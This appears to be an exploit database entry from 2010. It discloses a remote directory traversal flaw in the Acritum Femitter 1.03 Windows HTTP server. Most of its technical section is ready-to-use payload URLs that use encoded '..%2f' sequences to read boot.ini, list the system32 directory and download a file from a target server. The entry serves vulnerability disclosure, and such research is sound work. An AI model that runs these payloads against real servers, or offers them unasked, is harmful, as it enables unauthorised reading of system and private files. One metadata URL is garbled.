[] NeoSense

Acritum Femitter 1.03 - Directory Traversal

Author: Dr_IDE
type: remote
platform: windows
port: 
date_added: 2010-04-19 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfem-dist.exe

############################################################
#
# Acritum Femitter v1.03 Directory Traversal Exploit
# Found By:             Dr_IDE
# Date:                 Apr. 20, 2010
# Tested On:            Windows 7
# Download:             http://acritum.com/fem/download.htm
#
############################################################

- Description -

Acritum Femitter v1.03 is a Windows based HTTP server. This is the latest
version of the application available.

Acritum Femitter v1.03 is vulnerable to remote directory traversal attack by the
following means.

- Technical Details -
http://[webserver IP]/[\../]

http://172.16.2.102////..%2f..%2f..%2f..%2fboot.ini                                             <- File Access
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32                             <- Full Directory Listing
http://172.16.2.102////..%2f..%2f..%2f..%2fwindows/system32/calc.exe    <- File Download

#[pocoftheday.blogspot.com]